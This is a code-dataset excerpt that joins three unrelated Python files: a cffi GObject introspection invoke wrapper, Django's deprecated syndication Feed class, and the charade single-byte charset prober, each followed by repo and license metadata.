def get_property(self):
res = lib.g_function_info_get_property(self._ptr)
if res:
return GIPropertyInfo(res)
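    # invoke() marshals the Python-side GIArgument wrappers into plain C
    # arrays with cffi before calling g_function_info_invoke(); ffi.NULL is
    # passed for any argument list or return slot that was not supplied.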
def invoke(self, in_args, out_args, return_value):
if return_value is None:
return_value = ffi.NULL
else:
return_value = return_value._ptr
if in_args is None:
in_args = ffi.NULL
n_in_args = 0
else:
n_in_args = len(in_args)
in_args = ffi.new("GIArgument[]", [a._ptr[0] for a in in_args])
if out_args is None:
out_args = ffi.NULL
n_out_args = 0
else:
n_out_args = len(out_args)
out_args = ffi.new("GIArgument[]", [a._ptr[0] for a in out_args])
with glib.gerror() as error:
res = lib.g_function_info_invoke(
self._ptr, in_args, n_in_args, out_args, n_out_args,
return_value, error)
return bool(res)
| gpl-3.0 |
Kazade/NeHe-Website | google_appengine/lib/django_1_2/django/contrib/syndication/feeds.py | 65 | 1374 | from django.contrib.syndication import views
from django.core.exceptions import ObjectDoesNotExist
import warnings
# This is part of the deprecated API
from django.contrib.syndication.views import FeedDoesNotExist, add_domain
class Feed(views.Feed):
"""Provided for backwards compatibility."""
def __init__(self, slug, request):
warnings.warn('The syndication feeds.Feed class is deprecated. Please '
'use the new class based view API.',
category=PendingDeprecationWarning)
self.slug = slug
self.request = request
self.feed_url = getattr(self, 'feed_url', None) or request.path
self.title_template = self.title_template or ('feeds/%s_title.html' % slug)
self.description_template = self.description_template or ('feeds/%s_description.html' % slug)
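    # In the deprecated API, get_object() receives the URL "bits" (the path
    # components following the feed slug) and can be overridden to look up
    # the object the feed describes; returning None means the feed does not
    # depend on the URL.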
def get_object(self, bits):
return None
def get_feed(self, url=None):
"""
Returns a feedgenerator.DefaultFeed object, fully populated, for
this feed. Raises FeedDoesNotExist for invalid parameters.
"""
if url:
bits = url.split('/')
else:
bits = []
try:
obj = self.get_object(bits)
except ObjectDoesNotExist:
raise FeedDoesNotExist
return super(Feed, self).get_feed(obj, self.request)
| bsd-3-clause |
patdoyle1/FastMath | lib/python2.7/site-packages/pip/_vendor/requests/packages/charade/sbcharsetprober.py | 2927 | 4793 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
from .compat import wrap_ord
SAMPLE_SIZE = 64
SB_ENOUGH_REL_THRESHOLD = 1024
POSITIVE_SHORTCUT_THRESHOLD = 0.95
NEGATIVE_SHORTCUT_THRESHOLD = 0.05
SYMBOL_CAT_ORDER = 250
NUMBER_OF_SEQ_CAT = 4
POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1
#NEGATIVE_CAT = 0
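# A single-byte prober maps each byte to a frequency "order" via the model's
# charToOrderMap; every pair of consecutive frequent characters indexes the
# model's precedenceMatrix, which buckets the pair into one of
# NUMBER_OF_SEQ_CAT likelihood categories.  The confidence is, roughly, the
# share of pairs that land in the most likely (POSITIVE_CAT) bucket,
# normalised by the model's typical positive ratio and by the fraction of
# frequent characters seen.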
class SingleByteCharSetProber(CharSetProber):
def __init__(self, model, reversed=False, nameProber=None):
CharSetProber.__init__(self)
self._mModel = model
# TRUE if we need to reverse every pair in the model lookup
self._mReversed = reversed
# Optional auxiliary prober for name decision
self._mNameProber = nameProber
self.reset()
def reset(self):
CharSetProber.reset(self)
# char order of last character
self._mLastOrder = 255
self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT
self._mTotalSeqs = 0
self._mTotalChar = 0
# characters that fall in our sampling range
self._mFreqChar = 0
def get_charset_name(self):
if self._mNameProber:
return self._mNameProber.get_charset_name()
else:
return self._mModel['charsetName']
def feed(self, aBuf):
if not self._mModel['keepEnglishLetter']:
aBuf = self.filter_without_english_letters(aBuf)
aLen = len(aBuf)
if not aLen:
return self.get_state()
for c in aBuf:
order = self._mModel['charToOrderMap'][wrap_ord(c)]
if order < SYMBOL_CAT_ORDER:
self._mTotalChar += 1
if order < SAMPLE_SIZE:
self._mFreqChar += 1
if self._mLastOrder < SAMPLE_SIZE:
self._mTotalSeqs += 1
if not self._mReversed:
i = (self._mLastOrder * SAMPLE_SIZE) + order
model = self._mModel['precedenceMatrix'][i]
else: # reverse the order of the letters in the lookup
i = (order * SAMPLE_SIZE) + self._mLastOrder
model = self._mModel['precedenceMatrix'][i]
self._mSeqCounters[model] += 1
self._mLastOrder = order
if self.get_state() == constants.eDetecting:
if self._mTotalSeqs > SB_ENOUGH_REL_THRESHOLD:
cf = self.get_confidence()
if cf > POSITIVE_SHORTCUT_THRESHOLD:
if constants._debug:
                        sys.stderr.write('%s confidence = %s, we have a '
'winner\n' %
(self._mModel['charsetName'], cf))
self._mState = constants.eFoundIt
elif cf < NEGATIVE_SHORTCUT_THRESHOLD:
if constants._debug:
                        sys.stderr.write('%s confidence = %s, below negative '
                                         'shortcut threshold %s\n' %
(self._mModel['charsetName'], cf,
NEGATIVE_SHORTCUT_THRESHOLD))
self._mState = constants.eNotMe
return self.get_state()
def get_confidence(self):
r = 0.01
if self._mTotalSeqs > 0:
r = ((1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs
/ self._mModel['mTypicalPositiveRatio'])
r = r * self._mFreqChar / self._mTotalChar
if r >= 1.0:
r = 0.99
return r
| gpl-2.0 |